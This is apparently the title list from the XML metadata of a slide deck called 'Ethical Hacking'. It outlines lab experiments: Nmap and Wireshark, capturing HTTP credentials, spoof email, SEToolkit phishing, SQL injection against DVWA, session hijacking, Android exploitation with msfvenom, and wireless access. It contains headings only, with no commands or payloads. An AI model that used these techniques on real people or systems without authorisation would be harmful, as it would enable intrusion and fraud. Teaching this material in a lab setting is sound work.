      <vt:lpstr>TCP Connect Scan using NMAP</vt:lpstr>
      <vt:lpstr>TCP Connect Scan using NMAP &amp; Wireshark</vt:lpstr>
      <vt:lpstr>TCP Connect Scan using NMAP &amp; Wireshark</vt:lpstr>
      <vt:lpstr>UDP Scan using NMAP &amp; Wireshark</vt:lpstr>
      <vt:lpstr>Version Scaning using NMAP </vt:lpstr>
      <vt:lpstr>Operating System Scanning using NMAP </vt:lpstr>
      <vt:lpstr>Normal Output</vt:lpstr>
      <vt:lpstr>XML Output</vt:lpstr>
      <vt:lpstr> Multiple Formats Output</vt:lpstr>
      <vt:lpstr>Enumerates Directories Used by Web Servers</vt:lpstr>
      <vt:lpstr>Enumerates MySQL Info</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WIRESHARK</vt:lpstr>
      <vt:lpstr>Wireshark having captured some packets and waiting for us to examine them.</vt:lpstr>
      <vt:lpstr>Apply TCP Filter</vt:lpstr>
      <vt:lpstr>Apply IP Address Filter</vt:lpstr>
      <vt:lpstr>Apply Multiple Filter</vt:lpstr>
      <vt:lpstr>Wireshark with HTTP:GET </vt:lpstr>
      <vt:lpstr>Wireshark with HTTP:GET</vt:lpstr>
      <vt:lpstr>Wireshark with HTTP Authentication</vt:lpstr>
      <vt:lpstr>Wireshark with HTTP Authentication</vt:lpstr>
      <vt:lpstr>Wireshark with HTTP Authentication</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>Lab Experiment No 6</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Different Languages May Used For Spoof Email</vt:lpstr>
      <vt:lpstr>WRITE AN EMAIL</vt:lpstr>
      <vt:lpstr>EMAIL SENT</vt:lpstr>
      <vt:lpstr>EMAIL REACH IN INBOX</vt:lpstr>
      <vt:lpstr>READING EMAIL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Intercept Web Traffic using Burp proxy</vt:lpstr>
      <vt:lpstr>Download Burp</vt:lpstr>
      <vt:lpstr>Install Burp</vt:lpstr>
      <vt:lpstr>Install Burp</vt:lpstr>
      <vt:lpstr>Install Burp</vt:lpstr>
      <vt:lpstr>Intercept HTTP traffic with Burp Proxy </vt:lpstr>
      <vt:lpstr>Step 1: Launch Burp's embedded browser </vt:lpstr>
      <vt:lpstr>Step 2: Intercept a request </vt:lpstr>
      <vt:lpstr>Step 2: Intercept a request </vt:lpstr>
      <vt:lpstr>Step 3: Forward the request </vt:lpstr>
      <vt:lpstr>Step 4: Switch off interception </vt:lpstr>
      <vt:lpstr>Step 5: View the HTTP history </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Traffic Poisoning using Burp Suite</vt:lpstr>
      <vt:lpstr>Step 1: Access the vulnerable website in the embedded browser </vt:lpstr>
      <vt:lpstr>Step 1: Access the vulnerable website in the embedded browser </vt:lpstr>
      <vt:lpstr>Step 1: Access the vulnerable website in the embedded browser </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Step 2: Study the HTTP history </vt:lpstr>
      <vt:lpstr>Step 3: Identify an interesting request </vt:lpstr>
      <vt:lpstr>Step 4: Send the request to Burp Repeater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Social Engineering using SEToolkit</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Few Example of Phishing</vt:lpstr>
      <vt:lpstr>Few Example of Phishing</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PHISHING IS CRIME: EXERCISE FOR LEARNING PURPOSES</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Host Discovery Using Metasploit</vt:lpstr>
      <vt:lpstr>Service Discovery Using Metasploit</vt:lpstr>
      <vt:lpstr>Port Scanning Using Metasploit</vt:lpstr>
      <vt:lpstr>Port Scanning Using Metasploit</vt:lpstr>
      <vt:lpstr>Port Scanning Using Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Enumerates Directories Used by Web Servers</vt:lpstr>
      <vt:lpstr>Enumerates MySQL Info</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Know IP Address of any website: Ping</vt:lpstr>
      <vt:lpstr>Know IP Address of any website: nslookup</vt:lpstr>
      <vt:lpstr>Know IP Address of any website: DNSLookup</vt:lpstr>
      <vt:lpstr>Dedicated IP and Shared Hosting</vt:lpstr>
      <vt:lpstr>Complete information about any website</vt:lpstr>
      <vt:lpstr>Complete information about any website</vt:lpstr>
      <vt:lpstr>Complete information about any website</vt:lpstr>
      <vt:lpstr>WHOIS LOOKUP</vt:lpstr>
      <vt:lpstr>WHOIS LOOKUP</vt:lpstr>
      <vt:lpstr>Complete information about any website</vt:lpstr>
      <vt:lpstr>Information Gathering of Website From Email</vt:lpstr>
      <vt:lpstr>Information Gathering of Website From Email</vt:lpstr>
      <vt:lpstr>Information Gathering of Website From Email</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>FINDING DVWA Cloud</vt:lpstr>
      <vt:lpstr>OPENING DVWA Cloud</vt:lpstr>
      <vt:lpstr>LOGIN TO DVWA Cloud</vt:lpstr>
      <vt:lpstr>GETTING IP ADDRESS OF DVWA Cloud</vt:lpstr>
      <vt:lpstr>IP ADDRESS OF DVWA Cloud</vt:lpstr>
      <vt:lpstr>DVWA Cloud</vt:lpstr>
      <vt:lpstr>INITIALIZING DVWA Cloud</vt:lpstr>
      <vt:lpstr>INITIALIZING DVWA Cloud</vt:lpstr>
      <vt:lpstr>CONNECTING DVWA Cloud</vt:lpstr>
      <vt:lpstr>WEB BASED MACHINE ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>DVWA Cloud</vt:lpstr>
      <vt:lpstr>NMAP ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>DVWA Cloud</vt:lpstr>
      <vt:lpstr>IFCONFIG ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>MACCHANGER ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>WIRESHARK ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>WIRESHARK ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>NMAP ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>WIRESHARK ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>TRACEROUTE ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>DIRB ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>NIKTO ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>SQLMAP ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>SETOOLKIT ON DVWA Cloud</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>STEP 1:  FINDING THE INPUT FIELD  </vt:lpstr>
      <vt:lpstr>GET BASED INJECTION</vt:lpstr>
      <vt:lpstr>POST BASED INJECTION</vt:lpstr>
      <vt:lpstr> HEADER AND COOKIE BASED  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>STEP 2: CREATING THE MALICIOUS INPUT  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CONCEPTUAL BLOCK DIAGRAM OF THE SQL INJECTION</vt:lpstr>
      <vt:lpstr>LIVE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SQLMAP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MITIGATION TECHNIQUE OF SQLI</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 16</vt:lpstr>
      <vt:lpstr>What is session hijacking ?</vt:lpstr>
      <vt:lpstr>How Session Hijacking Happens</vt:lpstr>
      <vt:lpstr>What is ZAP(zed attack proxy) ?  </vt:lpstr>
      <vt:lpstr>ZAP  Features</vt:lpstr>
      <vt:lpstr>ZAP  Features</vt:lpstr>
      <vt:lpstr>How does ZAP tool works ?</vt:lpstr>
      <vt:lpstr>How do you use ZAP ?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Check the proxy server checkbox and enter the attackers machine ip address and port 8080  </vt:lpstr>
      <vt:lpstr>Setup ZAP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 About ZAP </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 17</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Exploiting Android using msf-venom </vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 18</vt:lpstr>
      <vt:lpstr>Wireless Scanning </vt:lpstr>
      <vt:lpstr>Wireless Scanning </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Wireless Enumeration </vt:lpstr>
      <vt:lpstr>Gaining Access </vt:lpstr>
      <vt:lpstr>Gaining Access </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>BRUPSUITE TOOLS -   1. SPIDER:  2. PROXY:    3. INTRUDER:  4. REPEATER:  5. SEQUENCER:  6. DECODER  7. SCANNER:  </vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>SOCIAL WELFARE BENEFITS</vt:lpstr>
      <vt:lpstr>INVENTIVE STEPS (TECHNOLOGIES)</vt:lpstr>
      <vt:lpstr>OPERATIONAL FLOW OF THE WORK</vt:lpstr>
      <vt:lpstr> DEMONSTRATION PART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Ethical Hacking</dc:title>
  <cp:lastModifiedBy>Microsoft account</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-17T10:18:17Z</dcterms:modified>
</cp:coreProperties>
</file>